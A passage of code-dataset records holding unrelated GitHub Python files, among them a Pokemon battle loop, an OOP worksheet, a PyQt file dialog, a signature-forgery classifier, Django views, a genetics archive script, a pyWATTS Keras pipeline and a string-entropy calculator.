if(not enemyMissTurn):\n if(attack == 1):\n health -= round(10 / edefense, 0)\n message(\"The enemy used {0}, it did {1} damage!\".format(attacks[0], round(10/edefense, 0)), bcolors.OKBLUE)\n elif(attack == 2):\n pp -= 5\n message(\"The enemy used {0}.\".format(attacks[1]), bcolors.OKBLUE)\n if(random.randint(1,4) == 4):\n missTurn = 1\n elif(attack == 3):\n drain = random.randint(5,20)\n pp -= drain\n epp += drain\n message(\"The enemy used {0}, they drained {1} mana!\".format(attacks[2], drain), bcolors.OKBLUE)\n elif(attack == 4):\n pp -= 10\n dmg = random.randint(1,3)\n health -= round(20*dmg / edefense,0)\n message(\"The enemy used {0}, they did {1} damage!\".format(attacks[3], round(20*dmg/defense),0), bcolors.OKBLUE)\n if(random.randint(0,1) == 1 and defense > 1):\n defense -= 1\n else:\n message(\"The enemies pokemon is confused, it did no damage.\", bcolors.FAIL)\n enemyMissTurn = 0\n \n\n \n makeScreen()\n checkHealth()\n printStats()\n atk()\n\natk()","repo_name":"OmerSabic/Pokemon","sub_path":"battle.py","file_name":"battle.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28782547279","text":"print(\"\\nQ1a\\n\")\n# Q1a: Create a class which of a country (include continent, climate, language etc in the inputs)\n# A1a:\n\nclass Country():\n def __init__(self, continent, climate, language):\n self.continent = continent\n self.climate = climate\n self.language = language\n\nprint(\"\\nQ1b\\n\")\n# Q1b: Create a subclass of a city which inherits from the country class\n# A1b:\n\n\nclass City(Country):\n def __init__(self, continent, climate, language):\n super().__init__(continent, climate, language)\n\n# -------------------------------------------------------------------------------------- #\nprint(\"\\nQ2a\\n\")\n# Q2a: Using the predefined class and is_prime method below, loop through list_of_numbers and create\n# a list of primes from that list\nlist_of_numbers = [1, 12, 44, 53, 6, 3, 6545, 76, 32, 345, 22, 17, 19, 223, 156]\n\n\nclass Number:\n def __init__(self, integer):\n self.integer = integer\n\n def is_prime(self):\n if self.integer >= 2:\n for x in range(2, self.integer):\n if self.integer % x == 0:\n return False\n return True\n\n else:\n return False\n def divisible_by_n(self, n):\n if self.integer % n == 0:\n return True\n else:\n return False\n# A2a:\nprime_list = []\nfor i in (list_of_numbers):\n #print(i)\n test_num = Number(i)\n if test_num.is_prime():\n prime_list.append(i)\nprint(prime_list)\n\nprint(\"\\nQ2b\\n\")\n# Q2b: Now create a list of numbers from list_of_numbers that are divisible\n# by both 3 and 4 using the divisible_by_n method above\n\ndivisible_by_3_and_4 = []\n\nfor i in list_of_numbers:\n test_num = Number(i)\n if test_num.divisible_by_n(3) and test_num.divisible_by_n(4):\n divisible_by_3_and_4.append(i)\nprint(divisible_by_3_and_4)\n# A2b:\n# -------------------------------------------------------------------------------------- #\nprint(\"\\nQ3a\\n\")\n# Q3a: Fix the following class and subclass (uncomment by selecting all rows and pressing CTRL + /)\nclass Boss(object):\n def __init__(self, name, attitude, behaviour, face):\n self.name = name\n self.attitude = attitude\n self.behaviour = behaviour\n self.face = face\n\n def get_attitude(self):\n return self.attitude\n\n def get_behaviour(self):\n return self.behaviour\n\n def get_face(self):\n return self.face\n\n\nclass GoodBoss(Boss):\n def __init__(self, name, attitude, behaviour, 
face):\n super().__init__(name, attitude, behaviour, face)\n\n def encourage(self):\n print(f\"The team cheers for {self.name}, starts shouting awesome slogans then gets back to work.\")\n# A3a:\n\n#Finish the function worksheet\n\n#Finish the OOP worksheet\n\n#Refactor your fizzbuzz game to use functions / classes","repo_name":"jo763/eng-99-python","sub_path":"OOP/worksheet.py","file_name":"worksheet.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40331736935","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@Time : 2017/5/5 22:28\n@Author : Zeroxus\n@Site : \n@File : fileDialog.py\n@Software: PyCharm\n'''\n\nimport sys\n\nfrom PyQt5.QtWidgets import QApplication,QMainWindow,QTextEdit,QAction,QFileDialog\nfrom PyQt5.QtGui import QIcon\n\nclass Example(QMainWindow):\n #设置了一个文本编辑框,文本编辑框是基于QMainWindow组件的。\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n self.textEdit = QTextEdit()\n self.setCentralWidget(self.textEdit)\n self.statusBar()\n\n openFile = QAction(QIcon('dog.png'),'Open',self)\n openFile.setShortcut('Ctrl+O')\n openFile.setStatusTip('Open new file')\n openFile.triggered.connect(self.showDialog)\n\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n fileMenu.addAction(openFile)\n\n self.setGeometry(300,300,350,300)\n self.setWindowTitle('File Dialog')\n self.show()\n\n def showDialog(self):\n #弹出QFileDialog窗口。getOpenFileName()方法的第一个参数是说明文字,\n # 第二个参数是默认打开的文件夹路径。默认情况下显示所有类型的文件\n fname = QFileDialog.getOpenFileName(self,'Open File', '/home')\n #读取选中的文件,并显示在文本编辑框内\n if fname[0]:\n f = open(fname[0],'r')\n\n with f:\n data = f.read()\n self.textEdit.setText(data)\n\nif __name__=='__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())","repo_name":"Zeroxus/pyqt5-demos","sub_path":"fileDialog.py","file_name":"fileDialog.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15826240441","text":"import numpy as np\nimport os\nimport torch.utils.data as data# 축약금지\nimport cv2\nimport copy\n\nclass CenternetDetPatchDataset(data.Dataset):\n\tdefault_resolution = [512, 512]\n\tmean = np.array([0, 0, 0],\n\t\t\t\t dtype=np.float32).reshape(1, 1, 3)\n\tstd = np.array([1, 1, 1],\n\t\t\t\t dtype=np.float32).reshape(1, 1, 3)\n\n\tdef __init__(self,opt,patch_labels,back_labels,class_name,negative_labels=None,dataset_capacity=8192):\n\t\tsuper(CenternetDetPatchDataset, self).__init__()\n\t\tself.data_dir=opt.data_dir\n\t\tself.max_objs = 128\n\t\tself._data_rng = np.random.RandomState(123)\n\t\tself._eig_val = np.array([0.2141788, 0.01817699, 0.00341571],\n\t\t\t\t\t\t\t\t dtype=np.float32)\n\t\tself._eig_vec = np.array([\n\t\t\t[-0.58752847, -0.69563484, 0.41340352],\n\t\t\t[-0.5832747, 0.00994535, -0.81221408],\n\t\t\t[-0.56089297, 0.71832671, 0.41158938]\n\t\t], dtype=np.float32)\n\t\topt.class_name=class_name\n\t\tself.opt=opt\n\t\tself.patch_labels = self.load_patch(copy.deepcopy(patch_labels))\n\t\tself.back_labels = self.load_imgs(raw_labels=copy.deepcopy(back_labels),type=cv2.IMREAD_COLOR)\n\t\tself.negative_labels=self.load_imgs(raw_labels=copy.deepcopy(negative_labels),type=cv2.IMREAD_COLOR)\n\t\tself.class_name = opt.class_name\n\t\tself.num_classes=len(self.class_name)\n\t\tself.class_to_ind = dict(zip(self.class_name, 
range(self.num_classes)))\n\t\tself.dataset_capacity=dataset_capacity\n\n\n\tdef load_imgs(self,raw_labels,size=512,type=cv2.IMREAD_UNCHANGED):\n\t\timgs = []\n\t\tfor dir in raw_labels:\n\t\t\timg = cv2.imread(dir, type)\n\t\t\tif (img is not None):\n\t\t\t\timg = cv2.resize(img, (size, size))\n\t\t\t\timgs.append(img)\n\t\treturn imgs\n\n\tdef load_patch(self,raw_labels,size=512,keep_ratio=True, type=cv2.IMREAD_UNCHANGED):\n\t\tfor i in range(len(raw_labels)):\n\t\t\tlabels=raw_labels[i]\n\t\t\tfor key in labels.keys():\n\t\t\t\timg_dirs=labels[key]\n\t\t\t\timgs=[]\n\t\t\t\tfor dir in img_dirs:\n\t\t\t\t\timg=cv2.imread(dir,type)\n\t\t\t\t\tif(img is not None):\n\t\t\t\t\t\tif(keep_ratio==True):\n\t\t\t\t\t\t\th,w,_=img.shape\n\t\t\t\t\t\t\tlength=max(h,w)\n\t\t\t\t\t\t\tscale=1\n\t\t\t\t\t\t\tif(length>size):\n\t\t\t\t\t\t\t\tscale=size/length\n\t\t\t\t\t\t\t\timg=cv2.resize(img,None,fx=scale,fy=scale)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\timg=cv2.resize(img,(size,size))\n\t\t\t\t\t\timgs.append((img,dir))\n\t\t\t\tlabels[key]=imgs\n\t\treturn raw_labels\n\n\n\tdef __len__(self):\n\t\treturn self.dataset_capacity\n\n\n","repo_name":"jhcnode/pytorch-Centernet-for-synthetic-data","sub_path":"lib/datasets/dataset/centernet_det_patch0.py","file_name":"centernet_det_patch0.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18671996822","text":"import tkinter as tk\r\nfrom tkinter.ttk import *\r\nfrom tkinter.filedialog import askopenfilename\r\nimport tensorflow._api.v2.compat.v1 as tf\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom time import time\r\nimport keras\r\nfrom skimage.filters import threshold_otsu\r\nfrom scipy import ndimage\r\nfrom skimage.measure import regionprops\r\nimport os\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\nfrom PIL import Image\r\nfrom mpl_toolkits import mplot3d\r\nfrom tkinter import messagebox\r\nimport customtkinter\r\n\r\n\r\ntf.disable_v2_behavior()\r\n\r\ngenuine_image_paths = r\"C:\\Users\\Marion\\Desktop\\ELECTRONIC SIGNATURE AUTHENTICATION\\ELECRONIC SIGNATURE\"\r\nforged_image_paths = r\"C:\\Users\\Marion\\Desktop\\ELECTRONIC SIGNATURE AUTHENTICATION\\ELECTRONIC FORGERY\"\r\n\r\ndef rgbgrey(img):\r\n # Converts rgb to grayscale\r\n greyimg = np.zeros((img.shape[0], img.shape[1]))\r\n for row in range(len(img)):\r\n for col in range(len(img[row])):\r\n greyimg[row][col] = np.average(img[row][col])\r\n return greyimg\r\n\r\n\r\ndef greybin(img):\r\n # Converts grayscale to binary\r\n blur_radius = 0.8\r\n img = ndimage.gaussian_filter(img, blur_radius) # to remove small components or noise\r\n # img = ndimage.binary_erosion(img).astype(img.dtype)\r\n thres = threshold_otsu(img)\r\n binimg = img > thres\r\n binimg = np.logical_not(binimg)\r\n return binimg\r\n\r\n\r\ndef preproc(path, img=None, display=True):\r\n if img is None:\r\n img = mpimg.imread(path)\r\n if display:\r\n plt.imshow(img)\r\n plt.show()\r\n grey = rgbgrey(img) # rgb to grey\r\n if display:\r\n plt.imshow(grey, cmap=matplotlib.cm.Greys_r)\r\n plt.show()\r\n binimg = greybin(grey) # grey to binary\r\n if display:\r\n plt.imshow(binimg, cmap=matplotlib.cm.Greys_r)\r\n plt.show()\r\n r, c = np.where(binimg == 1)\r\n # Now we will make a bounding box with the boundary as the position of pixels on extreme.\r\n # Thus we will get a cropped image with only the signature 
part.\r\n    signimg = binimg[r.min(): r.max(), c.min(): c.max()]\r\n    if display:\r\n        plt.imshow(signimg, cmap=matplotlib.cm.Greys_r)\r\n        plt.show()\r\n    return signimg\r\n\r\n\r\ndef Ratio(img):\r\n    a = 0\r\n    for row in range(len(img)):\r\n        for col in range(len(img[0])):\r\n            if img[row][col] == True:\r\n                a = a + 1\r\n    total = img.shape[0] * img.shape[1]\r\n    return a / total\r\n\r\n\r\ndef Centroid(img):\r\n    numOfWhites = 0\r\n    a = np.array([0, 0])\r\n    for row in range(len(img)):\r\n        for col in range(len(img[0])):\r\n            if img[row][col] == True:\r\n                b = np.array([row, col])\r\n                a = np.add(a, b)\r\n                numOfWhites += 1\r\n    rowcols = np.array([img.shape[0], img.shape[1]])\r\n    centroid = a / numOfWhites\r\n    centroid = centroid / rowcols\r\n    return centroid[0], centroid[1]\r\n\r\n\r\ndef EccentricitySolidity(img):\r\n    r = regionprops(img.astype(\"int8\"))\r\n    return r[0].eccentricity, r[0].solidity\r\n\r\n\r\ndef SkewKurt(img):\r\n    if np.sum(img) != 0:\r\n        M = cv2.moments(img)\r\n        skew = round(float(M['mu11']) / float(M['mu02']), 2)\r\n        kurt = round(float(M['mu40']) / float(M['mu02']), 2)\r\n        return skew, kurt\r\n    else:\r\n        return 0, 0\r\n\r\n\r\ndef extract_features(image_path):\r\n    img = preproc(image_path, img=None, display=False)\r\n    ratio = Ratio(img)\r\n    centroid_x, centroid_y = Centroid(img)\r\n    eccentricity, solidity = EccentricitySolidity(img)\r\n    skewness, kurtosis = SkewKurt(img)\r\n    features = [ratio, centroid_x, centroid_y, eccentricity, solidity, skewness, kurtosis]\r\n    return features\r\n\r\n\r\ndef create_dataset(genuine_paths, forged_paths):\r\n    data = []\r\n    labels = []\r\n    for path in genuine_paths:\r\n        features = extract_features(path)\r\n        data.append(features)\r\n        labels.append(1) # genuine class label: 1\r\n    for path in forged_paths:\r\n        features = extract_features(path)\r\n        data.append(features)\r\n        labels.append(0) # forged class label: 0\r\n    return data, labels\r\n\r\n\r\ndef normalize_data(data):\r\n    data = np.array(data)\r\n    data = (data - np.min(data, axis=0)) / (np.max(data, axis=0) - np.min(data, axis=0))\r\n    return data\r\n\r\n\r\ndef train_test_split(data, labels, test_size=0.2):\r\n    num_samples = len(data)\r\n    num_test_samples = int(test_size * num_samples)\r\n    indices = np.random.permutation(num_samples)\r\n    test_indices = indices[:num_test_samples]\r\n    train_indices = indices[num_test_samples:]\r\n    train_data = data[train_indices]\r\n    train_labels = np.array(labels)[train_indices]\r\n    test_data = data[test_indices]\r\n    test_labels = np.array(labels)[test_indices]\r\n    return train_data, train_labels, test_data, test_labels\r\n\r\n\r\ndef create_model(input_shape):\r\n    model = tf.keras.Sequential()\r\n    model.add(tf.keras.layers.Dense(100, activation='relu', input_shape=input_shape))\r\n    model.add(tf.keras.layers.Dense(100, activation='relu'))\r\n    model.add(tf.keras.layers.Dense(100, activation='relu'))\r\n    model.add(tf.keras.layers.Dense(1, activation='sigmoid'))\r\n    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\r\n    return model\r\n\r\n\r\ndef train_model(train_data, train_labels, input_shape, epochs=100):\r\n    model = create_model(input_shape)\r\n    model.fit(train_data, train_labels, epochs=epochs, verbose=0)\r\n    return model\r\n\r\n\r\ndef evaluate_model(model, test_data, test_labels):\r\n    _, accuracy = model.evaluate(test_data, test_labels, verbose=0)\r\n    return accuracy\r\n\r\n\r\ndef predict(model, data):\r\n    predictions = model.predict(data)\r\n    return predictions.flatten()\r\n\r\n\r\n
/usr/bin/env python\n\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.models import Label, Title\n\n\ndef plot_single_drift_simulation(xdata, ydata, output_filename):\n output_file(output_filename)\n\n p = figure(\n plot_width=600, plot_height=600,\n x_axis_label=\"Generations\", y_axis_label=\"Frequency\",\n y_range=(0,1)\n )\n\n # add a line renderer\n p.line(xdata, ydata, line_width=1)\n\n title = Title(text=\"The Effect of Genetic Drift\", align=\"center\")\n p.add_layout(title, \"above\")\n\n show(p)\n\n\ndef plot_multiple_drift_simulations(xdata_list, ydata_list, output_filename):\n # this probably works for just one simulation as well\n # thus, making above function absolete\n from bokeh.palettes import Spectral11\n output_file(output_filename)\n\n p = figure(\n plot_width=600, plot_height=600,\n x_axis_label=\"Generations\", y_axis_label=\"Frequency\",\n y_range=(0,1)\n )\n\n palette = Spectral11[0:len(xdata_list)]\n\n p.multi_line(\n xs=xdata_list, ys=ydata_list,\n line_color=palette, line_width=2\n )\n\n title = Title(text=\"The Effect of Genetic Drift\", align=\"center\")\n p.add_layout(title, \"above\")\n\n show(p)\n","repo_name":"mccannj9/PopPyGen","sub_path":"Plotters/BokehWrappers.py","file_name":"BokehWrappers.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"24245859735","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import Curso\nfrom datetime import datetime\n\n# Create your views here.\ndef acessar_curso(request):\n return render(request, 'acessar_curso.html') \n # HttpResponse('Olá mundo!')\n\ndef listar_curso(request):\n nome_filtrar = request.GET.get('nome_filtrar')\n carga_horaria_filtrar = request.GET.get('carga_horaria')\n\n\n curso = Curso.objects.all()\n \n if nome_filtrar:\n curso = curso.filter(nome__contains=nome_filtrar)\n\n #curso = Curso.objects.filter(nome__contains=nome_filtrar)\n #else:\n # curso = Curso.objects.all()\n\n if carga_horaria_filtrar:\n curso = curso.filter(carga_horaria__gte=carga_horaria_filtrar)\n \n return render(request, 'listar_curso.html', {'curso':curso}) \n\ndef criar_curso(request):\n\n if request.method == \"GET\":\n status = request.GET.get('status')\n\n return render(request, 'criar_curso.html', {'status': status})\n elif request.method == \"POST\":\n #print(request.POST.get('nome'))\n #print(request.POST.get('carga_horaria'))\n nome_digitado= request.POST.get('nome')\n carga_horaria_digitado = request.POST.get('carga_horaria')\n\n curso = Curso(\n nome= nome_digitado,\n carga_horaria=carga_horaria_digitado,\n data_criacao=datetime.now()\n )\n curso.save()\n\n return redirect('/curso/criar_curso/?status=1')\n\ndef ver_curso(request, id):\n curso = Curso.objects.get(id=id)\n return render(request, 'ver_curso.html', {'curso': curso}) #HttpResponse(id)\n\ndef deletar_curso(request, id):\n curso = Curso.objects.get(id=id)\n #curso.delete()\n curso.ativo = False\n curso.save()\n return redirect('/curso/listar_curso')\n\n","repo_name":"henrimory/Treinando-Python-Django","sub_path":"cursos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42720150212","text":"# make_new_archive.py sets up for a NEW set of runs, for example if\n# you have changed the reference data, maps, or zones files. 
It\n# does not run any analyses itself, but it creates the archive and\n# edits the ivory_paths file to point at it. It must be given an \n# archive name that, when combined with the archive root found in\n# ivory_paths.tsv, does NOT point to any existing archive.\n\n# Run this in the parent directory of all seizures\n\nimport sys\nimport os\nimport subprocess\nfrom subprocess import Popen, PIPE\nimport ivory_lib as iv\n\n############################################################################\n## main program\n\nif len(sys.argv) != 3:\n print(\"USAGE: python3 make_new_archive.py pathsfile.tsv new_archive\")\n exit(-1)\n\npathsfile = os.path.abspath(sys.argv[1])\nnew_archname = sys.argv[2]\nif not new_archname.endswith(\"/\"):\n new_archname += \"/\"\n\n# read ivory_paths.tsv file\npathdir = iv.readivorypath(pathsfile)\narch_dir, old_archname = pathdir[\"fammatch_archive_dir\"]\n\n# base directory must exist\nif not os.path.isdir(arch_dir):\n print(\"Archive base directory\",arch_dir,\"does not exist\")\n print(\"Did you forget to mount the hard drive?\")\n exit(-1)\n\n# the new archive must not exist\nif os.path.isdir(arch_dir + new_archname):\n print(\"Cannot create new archive\",new_archname,\"as it already exists\")\n exit(-1)\n\n# create new archive and subdirectories within it\ncommand = [\"mkdir\",arch_dir + new_archname]\niv.run_and_report(command, \"Unable to create archive\")\ntry:\n command = [\"mkdir\",arch_dir + new_archname + \"old_inputs\"]\n iv.run_and_report(command, \"Unable to create subdirectory 'old_inputs'\")\n command = [\"mkdir\",arch_dir + new_archname + \"reference\"]\n iv.run_and_report(command, \"Unable to create subdirectory 'reference'\")\nexcept:\n print(\"Archive could not be completely created; deleting it\")\n command = [\"rm -rf\",arch_dir + new_archname]\n iv.run_and_report(command,\"Could not delete failed archive\")\n exit(-1)\n\nprint(\"New archive created as\",arch_dir + new_archname)\n\n# Edit ivory_paths to point at new archive\nfound_archive = False\nfound_meta = False\npathdata = open(pathsfile,\"r\").readlines()\nnewpathdata = []\nfor line in pathdata:\n if line.startswith(\"fammatch_archive_dir\"):\n newline = [\"fammatch_archive_dir\",arch_dir,new_archname]\n newline = \"\\t\".join(newline) + \"\\n\"\n newpathdata.append(newline)\n found_archive = True\n elif line.startswith(\"metadata_prefix\"):\n parts = line.split(\"\\t\")\n newline = [parts[0],arch_dir + new_archname,parts[2]]\n newline = \"\\t\".join(newline) # parts didn't get rstrip(), so no xtra \"\\n\" needed\n newpathdata.append(newline)\n found_meta = True\n else:\n newpathdata.append(line)\nprint(\"Name of fammatch archive changed in\",pathsfile)\n\nif not found_archive:\n print(\"Could not find fammatch_archive_dir entry in\",pathsfile)\n print(\"Hand-edit this file to add the new archive before proceeding\")\nelif not found_meta:\n print(\"Could not find metadata_prefix entry in\",pathsfile)\n print(\"Hand-edit this file to add the new archive before proceeding\")\nelse:\n pathout = open(pathsfile,\"w\")\n for line in newpathdata:\n pathout.write(line)\n pathout.close()\n","repo_name":"mkkuhner/ivory_pipeline","sub_path":"src/make_new_archive.py","file_name":"make_new_archive.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21909871741","text":"import cv2\nimport os\nimport numpy as np\n\n# Read the image and convert to grayscale\nimage_path = 
\"test5\\image84-1.tiff\"\nimage_name = os.path.basename(image_path)\nimage = cv2.imread(image_path)\ngray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Apply Gaussian blur to reduce noise\nblurred_image = cv2.GaussianBlur(gray_image, (5, 5), 0)\n\n# Apply Hough Circle Transform to detect circles\ncircles = circles = cv2.HoughCircles(blurred_image,cv2.HOUGH_GRADIENT,1,20,\n param1=60,param2=40,minRadius=650,maxRadius=660)\ncircles = np.uint16(np.around(circles))\n\n# Find the circle with the highest accumulator value (param2)\nmax_acc_value = 0\nselected_circle = None\nfor circle in circles[0, :]:\n x, y, r = circle\n if r > max_acc_value:\n max_acc_value = r\n selected_circle = circle\n \n\n\n# Get the bounding box of the circle\nx, y, r = selected_circle\nx, y, r = int(x), int(y), int(r)\nx1, y1, x2, y2 = x - r, y - r, x + r, y + r\n\n# Crop the image using the bounding box\ncropped_image = image[y1:y2, x1:x2]\n\n# Save the cropped image\ncv2.imwrite(image_name, cropped_image)\n\n# Display the original and cropped images (optional)\ncv2.imshow(\"Original Image\", image)\ncv2.imshow(\"Cropped Image\", selected_circle)\n# cv2.imwrite( 'Cropped_circles.jpg', cropped_image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"xc720/Rotated_contact_lense","sub_path":"Rotation_calculation/OBR/circle_detection.py","file_name":"circle_detection.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72064912250","text":"# -----------------------------------------------------------\n# This example presents the code used in the advanced example\n# guide in the pyWATTS documentation.\n# -----------------------------------------------------------\n\nimport pandas as pd\nfrom keras import layers, Model\nfrom pywatts_pipeline.core.pipeline import Pipeline\n# From pyWATTS the pipeline is imported\nfrom pywatts_pipeline.core.util.computation_mode import ComputationMode\nfrom sklearn.preprocessing import StandardScaler\nfrom keras import backend as K\n\nfrom pywatts.callbacks import LinePlotCallback\n# Import the pyWATTS pipeline and the required modules\nfrom pywatts.modules import LinearInterpolater, SKLearnWrapper, KerasWrapper, Select\nfrom pywatts.summaries import RMSE\n\n\ndef get_keras_model():\n # write the model with the Functional API, Sequential does not support multiple input tensors\n\n input_1 = layers.Input(shape=(24,),\n name='lag_features') # layer name must match time series name\n hidden = layers.Dense(10,\n activation='tanh',\n name='hidden')(input_1)\n output = layers.Dense(24,\n activation='linear',\n name='target')(hidden) # layer name must match time series name\n model = Model(inputs=[input_1], outputs=output)\n return model\n\n\nif __name__ == \"__main__\":\n keras_model = get_keras_model()\n\n pipeline = Pipeline(path=\"../results/keras_model\")\n\n # Deal with missing values through linear interpolation\n imputer_power_statistics = LinearInterpolater(method=\"nearest\", dim=\"time\",\n name=\"imputer_power\")(x=pipeline[\"load_power_statistics\"])\n\n # Scale the data using a standard SKLearn scaler\n power_scaler = SKLearnWrapper(module=StandardScaler(), name=\"scaler_power\")\n scale_power_statistics = power_scaler(x=imputer_power_statistics)\n\n # Create lagged time series to later be used in the regression\n # sampler_module -> 2D-Zeitreihe\n lag_features = Select(start=-23, stop=1, step=1, name=\"lag_features\")(x=scale_power_statistics)\n target = 
Select(start=1, stop=25, step=1, name=\"target\")(x=scale_power_statistics)\n target_unscaled = Select(start=1, stop=25, step=1, name=\"target\")(x=imputer_power_statistics)\n\n keras_wrapper = KerasWrapper(keras_model,\n custom_objects={\"\": lambda x, y: K.sqrt(K.mean(K.square(x - y)))},\n fit_kwargs={\"batch_size\": 8, \"epochs\": 1},\n compile_kwargs={\"loss\": lambda x, y: K.sqrt(K.mean(K.square(x - y))),\n \"optimizer\": \"Adam\",\n \"metrics\": [\"mse\"]}) \\\n (lag_features=lag_features,\n target=target)\n\n inverse_power_scale_dl = power_scaler(x=keras_wrapper,\n computation_mode=ComputationMode.Transform,\n method=\"inverse_transform\",\n callbacks=[LinePlotCallback(\"prediction\")])\n\n rmse_dl = RMSE()(keras_model=inverse_power_scale_dl, y=target_unscaled)\n\n # Now, the pipeline is complete\n # so we can load data and train the model\n data = pd.read_csv(\"../data/getting_started_data.csv\",\n index_col=\"time\",\n parse_dates=[\"time\"],\n infer_datetime_format=True,\n sep=\",\")\n\n pipeline.train(data[:6000])\n pipeline.test(data[6000:])\n pipeline.to_folder(\"pipe_keras\")\n\n pipeline = Pipeline.from_folder(\"pipe_keras\")\n pipeline.test(data[6000:])\n print(\"Finished\")\n","repo_name":"KIT-IAI/pyWATTS","sub_path":"examples/example_keras.py","file_name":"example_keras.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"77"} +{"seq_id":"29260657319","text":"'''\n entro.py calculates the entropy of a given string or file\n\n This uses the negative sum of the log (to the base of 2) of the probability\n times the probability of a char to occur in a certain string as the entropy.\n'''\n# Source: https://github.com/creyD/entro.py/blob/ab61e24d67ef2cdb0f50f3a814c5be04a8238d05/entro.py\n\nimport math\nimport argparse\n\n\n# Calculates the entropy of a given string (as described in the docstring)\ndef calcEntropy(string):\n alphabet, alphabet_size, entropy = {}, 0, 0\n\n for char in string:\n if char in alphabet:\n alphabet[char] += 1\n else:\n alphabet[char] = 1\n alphabet_size += 1\n\n for char in alphabet:\n alphabet[char] = alphabet[char] / alphabet_size\n entropy += alphabet[char] * math.log(alphabet[char], 2)\n\n return -entropy, alphabet\n\n# Calculates the entropy of a given string and returns only its entropy (as measured in bits)\ndef getEntropy(string):\n alphabet, alphabet_size, entropy = {}, 0, 0\n\n for char in string:\n if char in alphabet:\n alphabet[char] += 1\n else:\n alphabet[char] = 1\n alphabet_size += 1\n\n for char in alphabet:\n alphabet[char] = alphabet[char] / alphabet_size\n entropy += alphabet[char] * math.log(alphabet[char], 2)\n\n return -entropy\n\n# Outputs a given entropy including the original text and the alphabet with probabilities\ndef printEntropy(original, entropy, alphabet, simple):\n print('---')\n if simple == False:\n print('Content: ' + original)\n print('Probabilities: ' + str(alphabet))\n print('Entropy: ' + str(entropy) + ' bits')\n print('---')\n\n\n# Reads a file by a given path\ndef getFile(path):\n f = open(path, 'r')\n content = f.read().replace('\\n', ' ')\n f.close()\n return content.strip()\n\n\n# List of the arguments one can use to influence the behavior of the program\nparser = argparse.ArgumentParser(description='Calculate the information entropy of some strings.')\n\n# INPUT ARGUMENTS\nparser.add_argument('strings', nargs='*', default='', type=str, help='Strings to calculate the entropy of.')\nparser.add_argument('--files', 
nargs='*', type=str, default='', help='Provide file path(s) to calculate the entropy of.')\n\n# OUTPUT OPTIONS\nparser.add_argument('--simple', nargs='?', type=bool, default=False, help='Determines the explicitness of the output. (True = only entropy shown)')\n\n# CONVERT OPTIONS\nparser.add_argument('--lower', nargs='?', type=bool, default=False, help='Converts given strings or textfiles to lowercase before calculating.')\nparser.add_argument('--upper', nargs='?', type=bool, default=False, help='Converts given strings or textfiles to uppercase before calculating.')\nparser.add_argument('--squash', nargs='?', type=bool, default=False, help='Removes all whitespaces before calculating.')\nargs, unknown = parser.parse_known_args()\n\n# Prepares the queue of different strings\nqueue = []\n\n# Add all the provided strings to the list\nfor string in args.strings:\n queue.append(string)\n\n# Add all the provided files to the list\nfor file in args.files:\n string = getFile(file)\n queue.append(string)\n\n# Interates over the collected strings and prints the entropies\nfor string in queue:\n if args.lower != False:\n string = string.lower()\n elif args.upper != False:\n string = string.upper()\n\n if args.squash != False:\n string = string.replace(\" \", \"\")\n\n a, b = calcEntropy(string)\n printEntropy(string, a, b, args.simple)\n\n# Calculating the conditional entropy of a text\n# Source: http://datasciencepadawan.blogspot.com/2015/03/computing-text-conditional-entropy-with.html?m=1\n\ndef ngram_list(text, n):\n ngram = []\n count = 0\n for token in text[:len(text)-n+1]:\n ngram.append(text[count:count+n])\n count = count + 1\n return ngram\n\ndef ngram_counts(text, n):\n ngram_dict = {}\n ngram_arr = ngram_list(text, n)\n\n for item in ngram_arr:\n ngram_dict[' '.join(item)] = (ngram_dict[' '.join(item)] + 1) if ' '.join(item) in ngram_dict else 1\n return ngram_dict\n\ndef conditional_entropy(data):\n unigram = ngram_counts(data, 1)\n bigram = ngram_counts(data, 2)\n N = sum(unigram.values())\n H = 0\n\n for key in bigram.keys():\n H -= bigram[key] / (1.0 * N) * math.log(bigram[key] / (1.0 * unigram[key.split(' ')[1]]), 2)\n return H\n\ndef experimental_entropy(data):\n unigram = ngram_counts(data, 2)\n bigram = ngram_counts(data, 3)\n N = sum(unigram.values())\n H = 0\n\n for key in bigram.keys():\n H -= bigram[key] / (1.0 * N) * math.log(bigram[key] / (1.0 * unigram[key.split(' ')[1]]), 2)\n return H\n\ndef test():\n print(\"pls 